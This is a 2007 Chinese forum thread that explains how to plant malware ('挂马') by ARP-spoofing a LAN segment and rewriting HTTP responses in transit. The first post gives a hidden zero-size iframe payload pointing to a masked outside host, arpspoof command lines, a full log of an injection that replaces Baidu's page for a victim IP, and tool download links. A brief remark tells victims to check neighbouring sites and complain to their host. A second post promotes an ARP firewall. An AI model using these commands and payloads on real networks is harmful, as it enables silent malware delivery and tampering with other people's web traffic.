Board logo

标题: [病毒查杀] 【挂马】通过arp欺骗来直接挂马 [打印本页]

作者: shillan    时间: 2007-5-12 23:18     标题: 【挂马】通过arp欺骗来直接挂马

ld上有不少网友中了此招,之前已经有人说arp,对没错就是卡巴都无能为力的arp欺骗

原理:

目的:通过arp欺骗来直接挂马
对服务器其下网站插入类似:
<iframe src=http://www.***.com/*.htm width=0 height=0></iframe>


优点:可以直接通过arp欺骗来挂马.
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码

但这样存在局限性:
1.管理员经常不登陆,那么要很久才能监听到密码
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.

优点:1.可以不用获得目标主机的权限就可以直接在上面挂马
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: a---->b ,a是访问的正常客户,b是要攻击的服务器,c是被我们控制的主机
arp中间人攻击时候: a---->c---->b
b---->c---->a
实际上,c在这里做了一次代理的作用

那么http请求发过来的时候,c判断下是哪个客户端发过来的包,转发给b,然后b返回http响应的时候,在http响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户a,就起到了一个挂马的作用.在这个过程中,b是没有任何感觉的,直接攻击的是正常的客户a,如果a是管理员或者是目标单位,就直接挂上马了.

实例:

欺骗192.168.0.108访问百度网站的全过程
效果: 192.168.0.108看到的百度首页只有一句话“hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
f:\arpspoof\release>arpspoof /n
arpspoof 3.1b by cooldiyer 06-10-30
[+] replace job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定

f:\arpspoof\release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
arpspoof 3.1b by cooldiyer 06-10-30
  • parsing rul <hea ==> hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
  • parsing rul <hea ==> hack by cooldiyer<noframes>
    [+] loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
  • spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
    [+] caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
  • forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
    [+] caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
  • forwarding untouched packet of size 62
    [+] caught 192.168.0.108:4304 -> 202.108.22.43:80
  • forwarding untouched packet of size 60
    [+] caught 192.168.0.108:4304 -> 202.108.22.43:80
  • forwarding untouched packet of size 399
    [+] caught 202.108.22.43:80 -> 192.168.0.108:4304
  • forwarding untouched packet of size 60
    [+] caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
    applying rul <hea ==> hack by cooldiyer<noframes> # 把“<hea”替换成了“hack by cooldiyer<noframes>”
  • done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
    [+] caught 202.108.22.43:80 -> 192.168.0.108:4304
  • forwarding untouched packet of size 1474
    [+] caught 192.168.0.108:4304 -> 202.108.22.43:80
  • forwarding untouched packet of size 60
    [+] caught 202.108.22.43:80 -> 192.168.0.108:4304
  • forwarding untouched packet of size 237
    [+] caught 192.168.0.108:4304 -> 202.108.22.43:80
  • forwarding untouched packet of size 60
    [+] reseting ..... # ctrl+c,程序自动恢复受骗主机的arp缓存
    [-] sleep 5s ............ # 5秒退出
    __________________________________________________________________________________

    其它说明:
    arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
    可保存数据到文件,
    arpspoof 192.168.0.1 192.168.0.108 80 2 1
    只显示数据
    被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt[/*]
  • [/*]
    相关文件下载
    http://201314.free.fr/attachments/200612/arpspoof.3.1.zip

    辅助工具下载:查找同服务器下有多少网站的工具
    http://soft.xishui.net/down/base/domain.exe


    作用:如果中招,通过此工具查找出你同服务器下其它网站,看是不是都被挂<iframe ..> 了
    没错,你同一个服务器下其它网站都被挂了,那ok,去叼你空间商去,叫他们提高网络安全意识,把arp欺骗干掉,至此问题解决。

    作者: shillan    时间: 2007-5-12 23:27

    arp防火墙单机版 4.1.1

    软件详细信息
      

      你的网络是否经常掉线,是否经常发生ip冲突?
         你是否担心通讯数据受到监控(如msn、qq、email)?
         你的网络速度是否受到网管软件限制(如聚生网管、p2p终结者)?
         你是否深受各种arp攻击软件之苦(如网络执法官、网络剪刀手、局域网终结者)?

         以上各种问题的根源都是arp欺骗(arp攻击)。在没有arp欺骗之前,数据流向是这样的:网关<->本机。arp欺骗之后,数据流向是这样的:网关<->攻击者(“网管”)<->本机,本机与网关之间的所有通讯数据都将流经攻击者(“网管”),所以“任人宰割”就在所难免了。

         arp防火墙通过在系统内核层拦截虚假arp数据包以及主动通告网关本机正确的mac地址,可以保障数据流向正确,不经过第三者,从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制,从而完美的解决上述所有问题。

         arp防火墙九大功能
         1. 拦截arp攻击。
            (a) 在系统内核层拦截外部虚假arp数据包,保障系统不受arp欺骗、arp攻击影响,保持网络畅通及通讯安全;
            (b) 在系统内核层拦截本机对外的arp攻击数据包,以减少感染恶意程序后对外攻击给用户带来的麻烦;
         2. 拦截ip冲突。在系统内核层拦截ip冲突数据包,保障系统不受ip冲突攻击的影响;
         3. dos攻击抑制。在系统内核层拦截本机对外的tcp syn/udp/icmp/arp dos攻击数据包,定位恶意发动dos攻击的程序,从而保证网络的畅通;
         4. 安全模式。除了网关外,不响应其它机器发送的arp request,达到隐身效果,减少受到arp攻击的几率;
         5. arp数据分析。分析本机接收到的所有arp数据包,掌握网络动态,找出潜在的攻击者或中毒的机器;
         6. 监测arp缓存。自动监测本机arp缓存表,如发现网关mac地址被恶意程序篡改,将报警并自动修复,以保持网络畅通及通讯安全;
         7. 主动防御。主动与网关保持通讯,通告网关正确的mac地址,以保持网络畅通及通讯安全;
         8. 追踪攻击者。发现攻击行为后,自动快速锁定攻击者ip地址;
         9. 查杀arp病毒。发现本机有对外攻击行为时,自动定位本机感染的恶意程序、病毒程序。

    下载地址:http://www.newhua.com/soft/52718.htm




    欢迎光临 逐梦论坛 (http://temp2023.zhumeng.org/) Powered by Discuz! 7.2